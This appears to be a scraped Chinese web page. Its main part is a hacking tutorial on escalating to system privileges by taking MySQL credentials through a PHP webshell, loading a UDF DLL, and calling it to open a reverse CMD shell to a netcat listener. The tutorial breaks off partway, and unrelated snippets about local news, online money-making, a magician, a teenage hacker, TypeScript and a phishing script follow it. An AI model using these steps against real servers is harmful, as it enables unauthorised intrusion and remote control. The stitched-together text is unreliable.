S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国 *** 安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传上去了,如图1
一般来说连接MYSQL的帐户密码很好找,随便编辑一个PHP文件,就看到了。如图2
看到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,如图3
哈连接成功了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好,不多说了,传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 来注册函数.
出现SQL语句成功执行!如图4
离拿到CMDSHELL已经不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)而后执行语句:select Mixconnect('192.168.1.254','1234'); 来激活那个函数,如图5
执行成功,然后看看我们的NC有反映没,如图6
根据南充市委安排,今天(3月8日)上午,蓬安县召开新任领导干部见面会,宣布市委关于文琴同志的任职决定。 市委组织部副部长、市委非公有制经济组织和社会组织工作委员会书记、市公务员局局长李彬出席...
网赚是什么东西(网赚行业,到底何为网赚行业)网赚不是什么很神奇的事情,网赚不是躺着赚钱的事情,不是什么很高科技的事情,不是什么很厉害的事情,而是很苦逼的事情,很累的事情,很要付出精力的事情,网赚是很l...
一个中国小伙最近网上大火,因为他在网上揭秘了传统中国魔术中的一些技法,竟然吸粉42万,点击率高达160万,年赚100万!但这也引发了众多争议和批评。 在北京西的一个文化中心的小房间里,魔术师田学明(...
原标题:荒唐!19岁的他国外归来做了一件事!被十堰民警抓了 自学计算机 在国外“深造”黑客技术 回国后 短短两周攻破600余个网站! 这名19岁青年在十堰落网 不足5人的“黑帽黑客团队...
一、typeof 简介 在 TypeScript 中, typeof 操作符可以用来获取一个变量或工具的类型。 interface Person { name: string; ag...
[1][2][3][4][5][6][7][8][9][10][11][12][13]黑客接单渠道选用airssl.sh这个bash脚本,树立垂钓热门。 二、在ubuntu上装置autossh 、ss...